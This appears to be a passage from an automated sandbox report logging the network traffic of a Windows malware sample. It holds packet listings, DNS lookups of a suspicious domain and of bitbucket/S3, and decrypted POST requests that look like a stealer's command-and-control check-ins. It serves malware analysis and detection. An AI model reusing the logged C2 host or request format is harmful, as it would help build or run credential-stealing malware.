Dec 24, 2024 11:22:43.335510969 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.335549116 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.336168051 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.336208105 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.339201927 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.339217901 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.339252949 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.339272976 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.339278936 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.339288950 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.343218088 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.343239069 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.343278885 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.343285084 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.343307972 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.346483946 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.346499920 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.346580029 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.346580029 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.346586943 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.350548029 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.350567102 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.350627899 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.350635052 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.350666046 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.354471922 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.518651962 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.518675089 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.518771887 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.518779993 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.518827915 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.519299984 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.522458076 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.522474051 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.522536993 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.522543907 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.526282072 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.526300907 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.526340008 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.526345968 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.526355982 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.529405117 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.529450893 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.529459953 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.529470921 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.529508114 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.530036926 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.530081987 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.533083916 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.533099890 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.533133030 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.533150911 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.533159971 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.533179045 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.533351898 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.536637068 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.536655903 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.536694050 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.536720037 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.536726952 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.536761999 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.540375948 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.540390968 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.540432930 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.540437937 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.540450096 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.540455103 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.540466070 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.540486097 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.544147968 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.544167042 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.544207096 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.544217110 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.544235945 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.554070950 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.713251114 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.713277102 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.713321924 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.713346958 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.713361025 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.713382959 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.716345072 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.716366053 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.716401100 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.716408014 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.716430902 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.720138073 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.720168114 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.720199108 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.720208883 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.720217943 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.720253944 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.723901033 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.723917007 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.723958969 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.723979950 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.724008083 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.724016905 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.724030972 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.727601051 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.727619886 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.727698088 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.727698088 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.727708101 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.731180906 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.731194973 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.731267929 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.731267929 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.731276989 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.734174967 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.734194994 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.734226942 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.734232903 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.734261036 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.736944914 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.736952066 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.737001896 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.903384924 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.903410912 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.903440952 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.903497934 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.903510094 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.903518915 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.907272100 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.907299042 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.907335043 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.907349110 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.907361984 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.910859108 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.910873890 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.910914898 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.910927057 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.910940886 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.913913012 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.913933039 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.913969040 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.913976908 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.913986921 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.917802095 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.917845011 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.917860031 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.917866945 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.917902946 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.917912960 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.921303988 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.921319008 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.921372890 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.921380997 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.921420097 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.921900034 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.922715902 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.925056934 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.925074100 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.925115108 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.925117016 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.925124884 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.925144911 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.925158978 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.928776979 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.928792953 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.928828001 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.928837061 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.928842068 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:43.928853035 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.928904057 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:43.946626902 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.097223997 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.097248077 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.097296000 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.097327948 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.097342014 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.098903894 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.098912954 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.100898027 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.100919008 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.100965977 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.100975037 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.100991964 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.104646921 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.104661942 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.104736090 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.104746103 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.104763031 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.108540058 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.108565092 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.108608961 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.108617067 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.108639956 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.111509085 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.111524105 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.111579895 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.111603022 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.111813068 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.112267017 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.112312078 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.115080118 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.115096092 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.115144014 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.115156889 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.115170956 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.116004944 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.116013050 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.118844032 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.118860960 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.118910074 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.118921041 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.118935108 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.142999887 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.289464951 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.289484978 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.289529085 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.289535046 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.289555073 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.289572001 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.289589882 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.291805029 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.291826010 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.291867971 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.291876078 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.291899920 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.295362949 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.295378923 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.295438051 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.295448065 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.295474052 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.298726082 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.298774958 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.298791885 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.298801899 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.298856020 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.299570084 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.299671888 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.299690008 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.299712896 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.323798895 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.343039989 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.471169949 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.471196890 CET	443	49745	16.182.108.137	192.168.2.4
Dec 24, 2024 11:22:44.471210957 CET	49745	443	192.168.2.4	16.182.108.137
Dec 24, 2024 11:22:44.471216917 CET	443	49745	16.182.108.137	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 11:22:12.738982916 CET	55347	53	192.168.2.4	1.1.1.1
Dec 24, 2024 11:22:13.046266079 CET	53	55347	1.1.1.1	192.168.2.4
Dec 24, 2024 11:22:37.287731886 CET	63946	53	192.168.2.4	1.1.1.1
Dec 24, 2024 11:22:37.426135063 CET	53	63946	1.1.1.1	192.168.2.4
Dec 24, 2024 11:22:39.957398891 CET	53462	53	192.168.2.4	1.1.1.1
Dec 24, 2024 11:22:40.095345020 CET	53	53462	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 11:22:12.738982916 CET	192.168.2.4	1.1.1.1	0xd8d7	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:37.287731886 CET	192.168.2.4	1.1.1.1	0xf0	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:39.957398891 CET	192.168.2.4	1.1.1.1	0x87b6	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 11:22:13.046266079 CET	1.1.1.1	192.168.2.4	0xd8d7	No error (0)	observerfry.lat		104.21.36.201	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:13.046266079 CET	1.1.1.1	192.168.2.4	0xd8d7	No error (0)	observerfry.lat		172.67.199.72	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:37.426135063 CET	1.1.1.1	192.168.2.4	0xf0	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:37.426135063 CET	1.1.1.1	192.168.2.4	0xf0	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:37.426135063 CET	1.1.1.1	192.168.2.4	0xf0	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.108.137	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.224.161	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.30.124	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.11.141	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.134.185	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.3.139	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.30.199	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:22:40.095345020 CET	1.1.1.1	192.168.2.4	0x87b6	No error (0)	s3-w.us-east-1.amazonaws.com		16.15.176.27	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

observerfry.lat

bitbucket.org

bbuseruploads.s3.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:14 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: observerfry.lat
2024-12-24 10:22:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 10:22:15 UTC	1124	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oihiu7qodqnvivhhfukv847trq; expires=Sat, 19 Apr 2025 04:08:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P2jhwFaqQ5MVwky%2FaWSlH9Yh4IzfFXW7xLM9WHyKpb2Oxsabv%2F%2BMqLXztVZOLUmqy9awKFZGnIwcyBFfO9IBDcyT07TfgdNVnKkWgfxpYNOA7lglJfKjpBBoMHKUuoiS2rg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fde7df9d88c6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1900&rtt_var=729&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1485249&cwnd=145&unsent_bytes=0&cid=bc03c037a44b67cc&ts=1017&x=0"
2024-12-24 10:22:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 10:22:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: observerfry.lat
2024-12-24 10:22:16 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-24 10:22:17 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=07c23bpeb7iphf0miusqtsnu10; expires=Sat, 19 Apr 2025 04:08:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XspwTwOFus3OXZnbfY2NwW%2BdhxHXENC72fOJuieKLQCLXUpbg8kOIS%2F2qKfewMX29SQE4Mv6s%2ByDiTgUhwtVHPYmY%2F8E1SMjHyYO2ccXmmmdbiLCxSnA8bK%2Fkqrt9dGAfXw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fde8b1c204316-EWR alt-svc: h3=":443"; ma=86400 server-timing: 